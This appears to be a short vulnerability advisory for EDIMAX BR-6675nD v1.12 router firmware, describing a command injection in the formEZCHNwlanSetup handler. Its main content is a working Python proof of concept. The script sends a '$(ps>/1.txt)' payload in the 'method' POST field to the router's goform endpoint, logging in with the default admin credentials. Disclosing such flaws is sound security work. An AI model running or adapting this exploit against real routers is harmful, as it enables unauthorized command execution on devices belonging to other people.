EDIMAX-BR-6675nD-formEZCHNwlanSetup

Overview

The device's official website: https://download.edimax.com/mw/cufiles/files/download/Firmware/BR6675ND_v1.12(TaiwanOnly).zip

Affected version

BR-6675nD v1.12

Vulnerability details

The EDIMAX BR-6675nD v1.12 firmware has a command injection vulnerability in the formEZCHNwlanSetup function. The v226 variables receive the method parameters from a POST request. However, since the user can control the input of these variables, the statement system() can cause a command injection.

POC

import requests

ip = "192.168.2.1"

payload = "$(ps>/1.txt)"
data = {
    "apMode": "",
    "band": "",
    "wisp": "0",
    "autoMacClone": "",
    "ssid": "",
    "chan": "",
    "wlanMac": "",
    "wlLinkMac1": "",
    "wlLinkMac2": "",
    "wlLinkMac3": "",
    "wlLinkMac4": "",
    "wlLinkMac5": "",
    "wlLinkMac6": "",
    "method": payload,
    "submit-url": "/"
}
url = f'http://{ip}/goform/formEZCHNwlanSetup'

res = requests.post(url=url, data=data, auth=("admin", "1234"), verify=False)
print(res)